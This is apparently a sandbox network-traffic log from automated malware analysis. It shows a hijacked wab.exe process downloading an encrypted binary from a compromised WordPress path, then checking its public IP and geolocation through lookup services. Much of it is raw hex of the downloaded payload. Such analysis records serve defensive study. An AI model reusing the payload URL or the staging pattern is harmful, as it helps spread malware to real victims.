friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49727	193.122.6.168	80	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:19:40.432826996 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:19:41.104821920 CEST	320	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:41 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: eade312548c64643ff0fec62b6c95492 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49729	193.122.6.168	80	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 10:19:41.846510887 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jul 25, 2024 10:19:44.510621071 CEST	730	IN	HTTP/1.1 502 Bad Gateway Date: Thu, 25 Jul 2024 08:19:44 GMT Content-Type: text/html Content-Length: 547 Connection: keep-alive X-Request-ID: b35c9ea9accde6245da47c4033bddf27 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 [TRUNCATED] Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49713	108.167.181.251	443	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:19:19 UTC	197	OUT	GET /wp-includes/QMHHyMk225.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: www.reap.skyestates.com.mt Cache-Control: no-cache
2024-07-25 08:19:19 UTC	249	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:19 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 24 Jul 2024 01:50:18 GMT Accept-Ranges: bytes Content-Length: 277056 Content-Type: application/octet-stream
2024-07-25 08:19:19 UTC	7943	IN	Data Raw: d7 a8 51 05 e8 db dc 1a 48 63 d5 85 98 3d 46 e9 de 6b 2c 41 f3 35 9f 24 5c 9c ad 94 c5 17 74 62 67 02 f7 74 b6 8f b1 64 c6 2e 71 c7 2f 13 53 ac c3 a6 f8 23 2d 0c bb 04 ac 5a dd 8e a6 95 46 9d 21 b8 67 dc a3 0b 65 00 40 85 b2 43 3c 12 b7 0b 86 78 60 bf bd 4b a5 68 35 b0 7b 83 dc 01 78 7b cd 95 e0 08 01 f1 f2 87 1c 73 06 54 70 67 76 c3 9d 36 be 7e 6a 4b d8 c3 b6 5b c9 2a 00 bd 9a 4c e1 35 df b2 8c 4b 38 1c 4d 89 ef c3 49 1d 76 8b 65 e2 63 74 6a e7 a0 9f 86 29 a6 ea a7 44 13 3e 37 c9 2f ad 4c 48 bf 93 ee 05 05 30 5b ee 49 d8 2f 48 e6 41 31 52 7b 7e c9 17 b9 8a ea 49 87 41 b3 a7 25 af 55 da ed 2b 38 28 d0 56 84 3a 8f 21 7a 0c 23 1d a7 85 9c a1 1e 8f 7c 1b ba 4f bc 2e 87 9a 52 e3 48 df a0 01 08 ba fb e0 e0 8e 38 af 84 c0 ba ce e8 79 48 4f 68 95 79 68 97 0e f9 Data Ascii: QHc=Fk,A5$\tbgtd.q/S#-ZF!ge@C<x`Kh5{x{sTpgv6~jK[*L5K8MIvectj)D>7/LH0[I/HA1R{~IA%U+8(V:!z#\|O.RH8yHOhyh
2024-07-25 08:19:19 UTC	8000	IN	Data Raw: 50 d2 e7 42 62 bb e6 64 1d 4f 49 90 ec 75 0d b6 dd ea f1 fc 9c d5 e7 82 2a f3 a1 40 f1 9a 0f 3e ad eb 76 8a eb 11 09 ba 18 3e 69 25 a0 67 16 e8 62 88 52 46 9a 00 72 78 59 67 d8 b4 8c 87 07 9a ab 5c c5 bd 22 8d 8b 71 12 89 ea 8b 41 49 61 0b 21 59 c1 0e e5 87 0b 9d 39 59 5d 1a 24 62 c0 b5 c4 b8 98 df 1d 38 f1 d8 46 ed f5 41 54 f5 68 24 bf 36 29 b7 2e 72 f8 e8 ee e0 26 59 93 c4 51 45 9c 95 e0 b5 c0 c4 c3 f5 f5 8a 33 15 60 62 49 06 bf 97 74 2b a4 00 f5 2f 72 6a de be 06 3b 89 7e 06 39 e1 3e 3b 4b 01 b4 7c ca e8 71 28 31 01 67 3a 44 e8 62 c3 31 a7 e9 d8 cb c7 12 45 29 c8 d4 e4 a2 8c 1c 88 68 cc 3e a7 5c 55 28 93 73 30 9c 90 44 35 bd 6e 57 77 57 54 81 be 8c 24 21 0c 7c d2 61 ce 46 be 15 87 01 bc 6b 11 f1 58 2c 54 2d cf 63 55 7a c8 6f e3 ab 96 7b d5 7b 46 83 5b Data Ascii: PBbdOIu*@>v>i%gbRFrxYg\"qAIa!Y9Y]$b8FATh$6).r&YQE3`bIt+/rj;~9>;K\|q(1g:Db1E)h>\U(s0D5nWwWT$!\|aFkX,T-cUzo{{F[
2024-07-25 08:19:19 UTC	8000	IN	Data Raw: ae fc 54 12 7b 4c c7 74 bb 10 e2 4d ff 87 3f 69 c7 99 57 e1 da 0a c9 51 a2 23 67 66 c8 e9 9b 79 f2 82 5e 9e 79 1a 19 74 58 77 da fe bb 47 03 f3 a4 be ce f5 85 a5 52 c6 65 a6 f3 ff b5 8b 8b cc a6 f1 39 96 98 4a 5d 29 cb 98 5f 64 5e a0 79 e4 76 5c 55 9a 81 b2 23 fa 7a 4a 8f 4b d8 2e 68 6c c8 c7 34 8d dc 48 da e4 4b 0a 1b db cd 8b 44 80 20 cc b1 1b ac d5 d4 9e b2 87 a6 97 9b ba db f7 65 b0 6a 84 ab 2d 35 02 5c f1 61 85 d3 9e c6 62 41 29 e0 90 0e 05 59 41 7a 68 3e ea b8 41 b3 49 a1 b1 0d e6 61 c2 dc 2e 33 fd 39 85 97 44 00 95 92 4f 59 a6 5a 09 c3 6a 3e cb 07 1b f4 48 d6 29 0d e1 44 dd c9 68 7e 37 61 66 a4 3b 5b 86 6d f9 8f aa b4 f4 fc 75 c1 a2 d8 a3 8d 63 ab 1d e3 b9 75 d1 d4 84 60 0f 03 24 99 33 28 2c 10 0a c1 a7 c9 db 30 55 6b 58 1b f5 71 12 e5 66 9d 4e f8 Data Ascii: T{LtM?iWQ#gfy^ytXwGRe9J])_d^yv\U#zJK.hl4HKD ej-5\abA)YAzh>AIa.39DOYZj>H)Dh~7af;[mucu`$3(,0UkXqfN
2024-07-25 08:19:19 UTC	8000	IN	Data Raw: 51 ed 91 7b c2 8d 9a 37 10 08 1f 6c 0e f5 67 3e 0d 2f 7b 26 2a a5 29 b3 04 dc 15 0b 82 33 6d 27 af 47 3d 64 2f 68 76 94 b5 0c 75 d3 0c 0c 71 50 2a 26 6a 8e 3b 4a 0a 46 a2 a4 33 33 e5 f9 74 6e 66 f8 93 bc ec fb 30 48 9a ad 7e f8 f1 47 b7 d1 6b 35 77 e1 70 4c d7 cc 3d 56 a5 26 2e b1 f4 a3 a2 92 e5 c8 ab 3f 2d 73 43 ae b4 61 59 53 0c 83 b5 cb 14 ce 7d 04 ad b0 a1 d2 0a 61 4b dd 41 9f ae cc 80 47 c0 90 00 20 fc ff d3 3b e5 f0 4c 8b d8 f1 62 17 11 c4 d7 55 69 ef 13 80 79 90 e9 cd a0 7b 1b 2d 44 85 b6 31 e7 fc b7 7b 2f 6d 48 6a bd 4b af 7b 63 c2 4d 92 dc 71 50 2d cd 95 ea 1b 16 e0 e5 f5 6b 74 06 24 1f b1 76 c3 97 36 96 24 6a 4b d2 d2 a0 34 95 2a 80 b7 89 54 fe 3d 17 3e 9d ff 41 be bb 31 ee 85 84 2d 35 f2 14 1f 2a 6e 77 50 c7 ed ed 44 97 9e a9 f3 7d 51 49 fa 54 Data Ascii: Q{7lg>/{&)3m'G=d/hvuqP&j;JF33tnf0H~Gk5wpL=V&.?-sCaYS}aKAG ;LbUiy{-D1{/mHjK{cMqP-kt$v6$jK4T=>A1-5nwPD}QIT
2024-07-25 08:19:19 UTC	8000	IN	Data Raw: 07 af 3a d1 78 f3 bc a1 bb 41 b3 32 6b b0 09 7d 3d 61 77 b8 34 19 88 cc 14 33 6c 1c a8 21 ed 50 df a4 39 40 d6 ed 96 70 42 10 43 38 67 77 83 e6 7f 0a b8 f5 a0 93 fc 96 01 3a d5 06 f2 bd 40 f1 98 71 6b ad da ea f8 ab 13 09 ca 0e 16 e8 24 a0 de b4 16 71 de 57 57 9e 22 e6 70 59 af a6 9b 8c 99 03 e8 8b 5e c5 be 99 a5 0a 7b 19 f1 98 7b 40 2a 4f 4c 27 60 f7 27 ae 87 0b 83 cb 58 74 68 82 6a b3 05 d3 35 91 f7 dc 39 d4 c4 4e 3c 12 52 51 eb 6f 34 23 b1 57 8d 2f 57 ea 8c b1 c5 35 55 eb 28 ff 45 96 9f d7 a3 a9 17 52 d8 fd df 04 04 65 70 bc e8 84 97 7e 21 b9 00 f5 af 6c 6a de f9 1d 3b 89 7e 79 c1 ab 3f 4b 13 49 b0 75 af 37 b6 28 3b 18 60 00 5b e4 e8 ec 80 a7 e8 f7 a9 ca 18 59 28 ab 7e d0 bd cb 1a 88 68 cc 8f 86 44 36 47 f3 c0 40 3e bf 4e 42 94 67 7a a8 2b 66 8a cb c2 Data Ascii: :xA2k}=aw43l!P9@pBC8gw:@qk$qWW"pY^{{@*OL'`'Xthj59N<RQo4#W/W5U(ERep~!lj;~y?KIu7(;`[Y(~hD6G@>NBgz+f
2024-07-25 08:19:19 UTC	8000	IN	Data Raw: f9 e4 d0 e3 ae 14 ae 84 a0 93 ce e8 68 08 67 6c b5 79 6e f8 f1 f9 03 f9 dc e0 27 e2 99 f6 54 97 2c 8f b6 c1 30 55 12 71 07 3c 74 bb 0a ee 45 d3 cd 38 64 cf b5 52 f7 d1 98 e7 55 a2 84 6c 66 c8 ab 9d 79 f1 81 5a 8f 7d 40 14 44 4e 66 de e0 95 71 2f f3 b5 9c d1 fc ab fe 7e c6 74 b2 ec f2 9b 99 a0 ab b6 e6 16 b6 a8 05 4c 2d d4 bf 71 24 64 a0 16 fd 69 7f 7f f1 b1 e3 32 fa 0a dd a1 46 f5 38 51 e9 d7 b7 67 84 29 7d d2 c9 59 20 17 e3 ed 8b 30 e0 98 32 a7 09 2c c8 d5 f1 b6 f4 4c 88 e9 ed 85 ec 15 98 35 eb 12 27 3f d9 fc 52 61 85 d9 c4 84 42 41 5f ea 4e 71 77 25 78 5a 18 4d 8f d7 37 b3 3d b4 32 0d 96 61 34 d8 2e 34 e8 3c be 92 7b 20 95 91 c4 71 1b 5a 2d c5 05 2e ca 79 73 fe 96 87 05 08 9c 9e f5 74 6c 55 27 15 d9 ed 1e 77 4c 6b 3e 85 b9 b4 87 0a 66 c6 b9 fa 0f f3 60 Data Ascii: hglyn'T,0Uq<tE8dRUlfyZ}@DNfq/~tL-q$di2F8Qg)}Y 02,L5'?RaBA_Nqw%xZM7=2a4.4<{ qZ-.ystlU'wLk>f`
2024-07-25 08:19:19 UTC	8000	IN	Data Raw: 58 0d 2b 29 1c 25 4d 87 01 b1 38 d7 3e 41 fd fe 77 60 ad 0e 97 80 fb 6f 75 5b 11 46 66 1b 48 87 f7 bc 2e 40 84 91 7b cc ee c1 1d 04 7a 09 42 9c f3 67 34 1b fa 6f 35 10 40 3b 8a 0e cf 13 64 c3 be 2d 2d 87 50 1a 72 5b ef 67 94 da a5 dd 84 24 b8 70 75 36 f6 c1 a5 49 52 a7 63 c5 0f b4 0f 83 b3 41 49 62 2a 14 83 87 d1 37 ea cf 15 29 a4 a8 6f c7 73 4a 41 1a e4 d2 63 69 9b 78 03 87 40 8c e4 4b 9a de ba fd c3 b8 26 f1 60 5d dc df 34 55 32 ae d6 bc ea 84 c8 df 2b a4 44 d2 42 39 70 2f 46 bf ea ae cc 9c 7c bc ee 28 2a fc db c2 3d cd b9 64 fc d2 71 40 17 00 d3 ee 89 7e 39 0a 9b 7d ea e6 db 9e dc 9b ff bb 85 b2 9d d3 c8 9f 3f 3e 78 6a ac b3 4b 8d 0a 75 b0 71 5d dc 01 52 7b cd 95 a1 14 01 f1 f2 87 1c 73 15 54 70 67 16 c2 9d 36 cd 7f 6a 4b c8 c3 b6 5b 8c 2a 80 bc 81 7c Data Ascii: X+)%M8>Aw`ou[FfH.@{zBg4o5@;d--Pr[g$pu6IRcAIb7)osJAcix@K&`]4U2+DB9p/F\|(=dq@~9}?>xjKuq]R{sTpg6jK[*\|
2024-07-25 08:19:19 UTC	8000	IN	Data Raw: 5d d5 fd dd b4 ff a7 b2 4f d3 1b fe 02 1e 9e 0d dc 4c 60 9e b2 e6 62 d0 c8 c3 ac c7 53 a2 75 c6 e5 1b 70 07 a2 27 81 3e f3 c6 84 fb 49 a5 30 ef d9 60 0b 2b 60 7d b2 36 71 1b 83 15 39 6c c4 d7 0a e6 7c de a1 5e 33 e4 cb 9c 00 f1 e8 52 1d 49 65 8b 89 52 1b bc f3 9f 2b ef 91 1d f4 8c 38 d2 bc 40 f1 90 1e 51 df 98 c8 8a 8c 7e 20 b8 18 38 64 2c b1 dc d0 bc 56 cd 22 29 b2 19 42 74 4a ab d0 a5 84 eb 59 bc ba 2c aa e7 8d 8d 8d 68 1c f3 9f 8d 33 51 6f 5d 51 36 ee 24 ae 81 18 91 3d 4f 41 1a 0a 4a c0 b5 bc 1c 99 df 1b 11 c3 cf 4e 45 c3 5b 40 e7 54 21 30 b6 2f a4 24 46 e5 d3 49 b7 74 18 84 9c d7 a5 9c 9f c0 8c 8a d2 52 d2 df b2 3b 04 63 67 df 3f 88 83 8a 22 bb 0a 96 d6 50 7c 86 25 a9 3b 83 65 0d 24 e7 3f 3b 31 03 bc 5d b1 5a 71 2e 28 14 60 11 5c d2 70 ac a8 53 e9 d2 Data Ascii: ]OL`bSup'>I0`+`}6q9l\|^3RIeR+8@Q~ 8d,V")BtJY,h3Qo]Q6$=OAJNE[@T!0/$FItR;cg?"P\|%;e$?;1]Zq.(`\pS
2024-07-25 08:19:19 UTC	8000	IN	Data Raw: e6 3a e6 df c6 7e 84 4a e0 08 78 0c 25 6f ef cb 9e d0 1d 9f 2b 69 16 25 b8 5e e8 a7 50 e3 4e f7 fb 01 16 f3 ec e5 f1 aa 10 bd 86 a0 b8 dd e0 68 00 63 2b b3 51 72 96 0c f3 6c e8 b2 1e 2d 8d 8f fc 7c 99 04 9c b2 ae cb 46 1b 6a 61 d7 8a ba 13 e8 5c f5 d4 c1 68 d5 92 46 ea f6 8e e4 a5 a2 93 6d 77 cc c4 c1 79 f2 98 4f 97 51 4b 1b 74 5f 64 de fe bb 4a 2f d3 a4 b0 3a f5 85 9c 5d d7 62 c4 a9 b1 b5 be e4 e5 a5 e2 0f fa c4 15 5d 23 e3 89 5d 64 49 b3 03 f9 7f 2e 0b e5 9a c2 35 d6 94 f3 8f 41 c8 c6 43 fc cc b5 64 9a 22 3b c6 ca e6 20 65 ca db 75 43 b0 88 c9 c3 47 2d c8 a4 88 9e 74 4c 82 91 dc 5b ef 3a a3 62 fa 1e 01 78 19 f9 12 61 85 d8 93 b9 10 04 77 e0 e0 ac 52 40 5e d8 3d 25 f7 56 0e b3 3f 2b 37 14 f7 6f 48 90 34 41 84 76 af e7 f5 15 8c 83 79 fb 83 46 5f 40 4d 2f Data Ascii: :~Jx%o+i%^PNhc+Qrl-\|Fja\hFmwyOQKt_dJ/:]b]#]dI.5ACd"; euCG-tL[:bxawR@^=%V?+7oH4AvyF_@M/
2024-07-25 08:19:19 UTC	8000	IN	Data Raw: 57 cf 73 86 17 1d 82 33 6f f6 58 25 94 78 1c ee c0 31 ec 82 31 bd 8a 7f 7d b2 01 d8 45 34 c9 ec 56 3d 53 17 ed 5b 8b 3f 1a 08 25 24 a3 62 9b 73 41 8b 4f 5e 68 b0 1e cb a6 f2 10 1b 19 3d 20 ec ca 53 96 f8 0f 0d 33 aa 12 5c c6 8f 6f 1d 65 78 09 4e 9c f8 19 13 1b d1 7e 24 35 9c 72 8a 04 d4 95 2c 9f be 29 27 af 57 1f 65 8b ef 66 85 c2 bf 56 fa 9d 46 8e af 20 84 91 86 6c 0a 31 46 d2 0c 05 24 9b e9 16 6e 62 50 68 a6 9e ea 33 09 f6 0f 5b e3 8f 6f b7 c2 6f 5a 0b 9f 71 46 75 78 20 24 87 20 2e c1 56 ce d7 92 e4 d9 88 29 53 e6 42 ae b0 29 55 42 1d f3 bc ff bd dc 7c 0e b1 3c 75 a6 1e 00 77 ad 97 9f a4 c6 96 69 9e 86 01 2a f6 d4 d4 0e 88 f1 64 fc de 82 43 15 00 d1 f3 89 1b c9 57 93 1c 8d d1 de a0 0d 43 08 2b a2 b0 43 c5 fa 6d 18 38 6e 73 b8 85 75 a4 68 75 b8 6a 84 ae Data Ascii: Ws3oX%x11}E4V=S[?%$bsAO^h= S3\oexN~$5r,)'WefVF l1F$nbPh3[ooZqFux $ .V)SB)UB\|<uwi*dCWC+Cm8nsuhuj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49715	188.114.97.3	443	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:19:23 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:19:23 UTC	710	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:23 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 24286 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ls1%2FIxb23PwTjc5putOEGiahEyl%2FfFfsu1Re4CvaUoRdDnUceK1Ja%2B7JW0kDTETCBZk7EB9suQ%2FUauz7agBO40HFEcckEF64en3zmKNZxNpUgnCOLQrAPKXbyyRLXfTVjWG%2BHWVV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab987e921c472-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:19:23 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:19:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49716	188.114.97.3	443	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:19:25 UTC	60	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org
2024-07-25 08:19:25 UTC	714	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:25 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 24288 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DmNDkdr0V8%2FvHqJTytMPBS1S5PiUWKR9EH2wSam%2FXn%2BuvskQfSxuMfL3qndJnBdw%2FTn4ZY%2B%2BpBhaZnJytzkbBnySMtVGrR6tcHLUXRz3olRY3l1%2F6VQ33hEwL4qMjdqu9iYsxZZx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab9954d3b43a4-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:19:25 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:19:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49718	188.114.97.3	443	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:19:28 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-07-25 08:19:28 UTC	708	IN	HTTP/1.1 200 OK Date: Thu, 25 Jul 2024 08:19:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 24291 Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y0yW6yEmsh8tfB1ikRlzRnaCABItf%2BI9iMvQtQrdi78vX9LzJbs%2FD8FlbxFp%2FV8gRAL4hOktUvyqPlE4wm0L0O6o%2BF8xjtk3woMMxM4ynqJLlLk4mjSoAFCjvgjiMiyd8magVPm6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a8ab9a83d9343c1-EWR alt-svc: h3=":443"; ma=86400
2024-07-25 08:19:28 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-07-25 08:19:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49720	188.114.97.3	443	6752	C:\Program Files (x86)\Windows Mail\wab.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-25 08:19:32 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
